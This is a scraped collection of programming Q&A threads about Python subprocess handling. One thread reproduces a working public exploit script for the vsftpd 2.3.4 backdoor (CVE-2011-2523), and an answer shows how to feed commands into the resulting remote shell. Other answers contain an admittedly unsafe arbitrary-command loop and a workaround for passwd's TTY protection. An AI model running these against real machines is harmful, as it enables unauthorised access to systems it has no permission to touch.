Spawn subprocess that expects console input without blocking? - python

I am trying to do a CVS login from Python by calling the cvs.exe process.
When calling cvs.exe by hand, it prints a message to the console and then waits for the user to input the password.
When calling it with subprocess.Popen, I've noticed that the call blocks. The code is
subprocess.Popen(cvscmd, shell = True, stdin = subprocess.PIPE, stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
I assume that it blocks because it's waiting for input, but my expectation was that calling Popen would return immediately and then I could call subprocess.communicate() to input the actual password. How can I achieve this behaviour and avoid blocking on Popen?
OS: Windows XP
Python: 2.6
cvs.exe: 1.11

Remove the shell=True part. Your shell has nothing to do with it. Using shell=True is a common cause of trouble.
Use a list of parameters for cmd.
Example:
cmd = ['cvs',
'-d:pserver:anonymous#bayonne.cvs.sourceforge.net:/cvsroot/bayonne',
'login']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
This won't block on my system (my script continues executing).
However since cvs reads the password directly from the terminal (not from standard input or output) you can't just write the password to the subprocess' stdin.
What you could do is pass the password as part of the CVSROOT specification instead, like this:
:pserver:<user>[:<passwd>]#<server>:/<path>
I.e. a function to login to a sourceforge project:
import subprocess
def login_to_sourceforge_cvs(project, username='anonymous', password=''):
host = '%s.cvs.sourceforge.net' % project
path = '/cvsroot/%s' % project
cmd = ['cvs',
'-d:pserver:%s:%s#%s:%s' % (username, password, host, path),
'login']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE
stderr=subprocess.STDOUT)
return p
This works for me. Calling
login_to_sourceforge_cvs('bayonne')
Will log in anonymously to the bayonne project's cvs.

If you are automating external programs that need input - like password - your best bet would probably be to use pexpect.

Related

How to interact with a reverse shell given by a script in python?

I would like to "automate" a reverse shell given by a script. Let me explain:
Contexte: There is a backdoor on a vulnerable machine.
What am I doing: I create a subprocess which executes a script (python, perl, ...) and which gives me a reverse shell.
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()
What I would like to do: Along with running my script <=> running my reverse shell, I would like to be able to interact with it, using methods.
Today, I am able to write manually in the terminal of my reverse shell: the script that I call with Popen runs and uses the backdoor. This gives me a reverse shell and I can type my commands.
Tomorrow, I would like to be able to call methods during the execution of this reverse shell: I run a script with Popen, it exploits the backdoor and gives me a shell. And rather than typing commands manually, I would like that automatically, a whole series of commands be sent to this reverse shell, and that for each one of them, I be able to recover the returned data.
Ideally, I would like something like that:
backdoor.execute() //This method allow me to get a reverse shell
backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
.
.
backdoor.finish() //This method allow to close the reverse shell
What I tried to do without success: I tried with the Popen class of the subprocess module, to redirect the input and / or the output of the script
Popen(["python", /opt/exploits/backdoor.py, remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
However, when trying to redirect these two streams (or just one of them), my reverse shell closes as quickly as it opened.
I also tried to put my commands directly on the communicate() method:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
I tried this with and without redirection of input and / or output, but nothing worked.
Finally, I tried to use the pexpect module to run my script to get a reverse shell, but I didn't have anything conclusive (maybe I did it wrong).
PS: I cannot change the code of the script that allows me to use the backdoor.
backdoor.py
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
This should work for the single command after a \n is appended and if the -u (unbuffered) option is used. Of course something has to be done with the return value in order to get the command output:
output = Popen(["python", "-u", "/opt/exploits/backdoor.py", remote_ip],
stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami\n")
backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
Provided that
backdoor = Popen(["python", "-u", "backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE)
we can send a command (if you don't want to exit thereafter) with e. g.
backdoor.stdin.write(b"whoami\n")
and get the result of indetermined length with
import select
import os
timeout = 1
while select.select([backdoor.stdout], [], [], timeout)[0]:
print(os.read(backdoor.stdout.fileno(), 4096).decode())

python subprocess module hangs for spark-submit command when writing STDOUT

I have a python script that is used to submit spark jobs using the spark-submit tool. I want to execute the command and write the output both to STDOUT and a logfile in real time. i'm using python 2.7 on a ubuntu server.
This is what I have so far in my SubmitJob.py script
#!/usr/bin/python
# Submit the command
def submitJob(cmd, log_file):
with open(log_file, 'w') as fh:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
output = process.stdout.readline()
if output == '' and process.poll() is not None:
break
if output:
print output.strip()
fh.write(output)
rc = process.poll()
return rc
if __name__ == "__main__":
cmdList = ["dse", "spark-submit", "--spark-master", "spark://127.0.0.1:7077", "--class", "com.spark.myapp", "./myapp.jar"]
log_file = "/tmp/out.log"
exist_status = submitJob(cmdList, log_file)
print "job finished with status ",exist_status
The strange thing is, when I execute the same command direcly in the shell it works fine and produces output on screen as the proggram proceeds.
So it looks like something is wrong in the way I'm using the subprocess.PIPE for stdout and writing the file.
What's the current recommended way to use subprocess module for writing to stdout and log file in real time line by line? I see bunch of options on the internet but not sure which is correct or latest.
thanks
Figured out what the problem was.
I was trying to redirect both stdout n stderr to pipe to display on screen. This seems to block the stdout when stderr is present. If I remove the stderr=stdout argument from Popen, it works fine. So for spark-submit it looks like you don't need to redirect stderr explicitly as it already does this implicitly
To print the Spark log
One can call the commandList given by user330612
cmdList = ["spark-submit", "--spark-master", "spark://127.0.0.1:7077", "--class", "com.spark.myapp", "./myapp.jar"]
Then it can be printed by using subprocess, remember to use communicate() to prevent deadlocks https://docs.python.org/2/library/subprocess.html
Warning Deadlock when using stdout=PIPE and/or stderr=PIPE and the child process generates enough output to a pipe such that it blocks waiting for the OS pipe buffer to accept more data. Use communicate() to avoid that. Here below is the code to print the log.
import subprocess
p = subprocess.Popen(cmdList,stdout=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
stderr=stderr.splitlines()
stdout=stdout.splitlines()
for line in stderr:
print line #now it can be printed line by line to a file or something else, for the log
for line in stdout:
print line #for the output
More information about subprocess and printing lines can be found at:
https://pymotw.com/2/subprocess/

How to prevent Python's subprocess from printing the standard out when calling the Linux passwd utility?

When I use subprocess I can normally capture the stdout and display it however I like. E.g,
import subprocess
proc = subprocess.Popen(['./foo.py'], stdin=subprocess.Pipe, stdout=subprocess.Pipe)
# the standard out is not displayed unless I do something with the stdout var
stdout, stderr = proc.communicate()
However, if I use subprocess to call the Linux passwd utility, the standard out is displayed as soon as proc.communicate() is called:
import subprocess
proc = subprocess.Popen(['passwd', 'foo'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# standard out is displayed immediately
stdout, stderr = proc.communicate('password\npassword\n')
BAD PASSWORD: it is based on a dictionary word
Retype new password:
How come this happens only with passwd? For example, it doesn't happen with ls. Is there anything I can do to prevent the standard out from being printed when calling passwd from subprocess?
Note that I want to actually capture the standard out and do something with it later, so I would not want to set stdout to a devnull pipe.
It only happens with passwd because passwd directly communicates with the TTY, not via stdin or stdout. This is a security measure, and accepted best practice for prompting for a password directly from a user.
If you really must bypass this security measure, consider using the unbuffer utility (shipped with expect) to create a fake TTY:
p = subprocess.Popen(['unbuffer', 'passwd', 'foo'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate('password\npassword\n')

How to redirect print and stdout to a pipe and read it from parent process?

If possible I would like to not use subProcess.popen. The reason I want to capture the stdout of the process started by the child is because I need to save the output of the child in a variable to display it back later. However I have yet to find a way to do so anywhere. I also need to activate multiple programs without necessarily closing the one that's active. I also need to be controlling the child process whit the parent process.
I'm launching a subprocess like this
listProgram = ["./perroquet.py"]
listOutput = ["","",""]
tubePerroquet = os.pipe()
pipeMain = os.pipe()
pipeAge = os.pipe()
pipeSavoir = os.pipe()
pid = os.fork()
process = 1
if pid == 0:
os.close(pipePerroquet[1])
os.dup2(pipePerroquet[0],0)
sys.stdout = os.fdopen(tubeMain[1], 'w')
os.execvp("./perroquet.py", listProgram)
Now as you can see I'm launching the program with os.execvp and using os.dup2() to redirect the stdout of the child. However I'm not sure of what I've done in the code and want to know of the correct way to redirect stdout with os.dup2 and then be able to read it in the parent process.
Thank you for your help.
I cannot understand why you do not want to use the excellent subprocess module that could save you a lot of boiler plate code (and as much error possibilities ...). Anyway, I assume perroquet.py is a python script, not an executable progam. Shell know how to find the correct interpretor for scripts, but exec family are low-level functions that expect a real executable program.
You should at least have something like :
listProgram = [ "python", "./perroquet.py","",""]
...
os.execvp("python", listProgram)
But I'd rather use :
prog = subprocess.Popen(("python", "./perroquet.py", "", ""), stdout = PIPE)
or even as you are already in python import it and directly call the functions from there.
EDIT :
It looks thart what you really want is :
user gives you a command (can be almost anything)
[ you validate that the command is safe ] - unsure if you intend to do it but you should ...
you make the shell execute the command and get its output - you may want to read stderr too and control exit code
You should try something like
while True:
cmd = raw_input("commande :") # input with Python 3
if cmd.strip().lower() == exit: break
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
out, err = proc.communicate()
code = proc.returncode
print("OUT", out, "ERR", err, "CODE", code)
It is absolutely unsafe, since this code executes any command as the underlying shell would do (include rm -rf *, rd /s/q ., ...), but it gives you the output, the output and the return code of the command, and it can be used is a loop. The only limitation is that as you use a different shell for each command, you cannot use commands that change shell environment - they will be executed but will have no effect.
Here's a solution if you need to extract any changes to the environment
from subprocess import Popen, PIPE
import os
def execute_and_get_env(cmd, initial_env=None):
if initial_env is None:
initial_env = os.environ
r_fd, w_fd = os.pipe()
write_env = "; env >&{}".format(w_fd)
p = Popen(cmd + write_env, shell=True, env=initial_env, pass_fds=[w_fd], stdout=PIPE, stderr=PIPE)
output, error = p.communicate()
# this will cause problems if the environment gets very large as
# writing to the pipe will hang because it gets full and we only
# read from the pipe when the process is over
os.close(w_fd)
with open(r_fd) as f:
env = dict(line[:-1].split("=", 1) for line in f)
return output, error, env
export_cmd = "export my_var='hello world'"
echo_cmd = "echo $my_var"
out, err, env = execute_and_get_env(export_cmd)
out, err, env = execute_and_get_env(echo_cmd, env)
print(out)

How to control a command window opened from a .cmd file using Python

There's a file named startup.cmd that sets some environment variables, runs some preparation commands, then does:
start "startup" cmd /k
Which opens a command shell named startup. The manual process I'm trying to automate is to then enter the following command into this shell: get startup.xml. I thought the correct way to do this in Python would be something like this:
import subprocess
p = subprocess.Popen('startup.cmd', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
getcommand = 'get startup.xml'
servercommand = 'startserver'
p.stdin.write(getcommand)
p.stdin.write(startserver)
(stdoutdata, stderrdata) = p.communicate()
print stdoutdata
print stderrdata
But those commands don't seem to be executing in the shell. What am I missing? Also, the command shell appears regardless of whether shell is set to True or False.
I found this warning in subprocess's document,
Warning Use communicate() rather than .stdin.write, .stdout.read or .stderr.read to avoid deadlocks due to any of the other OS pipe buffers filling up and blocking the child process.
So my suggestion is to use communicate to send your command.
import subprocess
p = subprocess.Popen('startup.cmd', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
command = 'get startup.xml\n'
command += 'startserver\n'
(stdoutdata, stderrdata) = p.communicate(command)
print stdoutdata
print stderrdata
This is a new process, so one cannot communicate directly with Popen.

Categories